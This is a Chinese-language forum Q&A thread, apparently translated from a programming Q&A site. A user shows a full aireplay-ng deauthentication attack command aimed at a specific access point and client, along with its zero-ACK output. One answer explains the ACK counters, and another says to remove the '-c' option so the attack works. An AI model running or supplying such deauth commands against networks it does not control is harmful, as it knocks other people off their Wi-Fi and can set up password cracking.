Aircrack deauth没有任何确认

时间:2016-10-18 14:30:44

标签: aircrack-ng

我已经在我的Kali Linux中使用了“Deauth”攻击,但是没有发送任何确认

root@kali:~# aireplay-ng --deauth 200 -a 6A:15:90:F4:4D:82 -c     F8:F1:B6:E8:E6:2A --ignore-negative-one wlan0mon 
12:26:31  Waiting for beacon frame (BSSID: 6A:15:90:F4:4D:82) on channel 9
12:26:32  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:32  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:41  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:42  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:02  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:03  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13  Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]

我如何使用此攻击?

由于

2 个答案:

答案 0 :(得分:2)

enter image description here

那么[28 | 63 ACKs]是什么意思?

这意味着:           [从客户端收到的确认信息|从AP收到的确认] 在这种情况下,从客户端接收28个ACK,从AP接收63个ACK

但在您的情况下零值肯定告诉客户端和/或AP没有听到您的数据包。 可能没有人(客户端)与目标AP连接。

答案 1 :(得分:-1)

我知道这很旧,但是只要删除“ -c”,你就可以了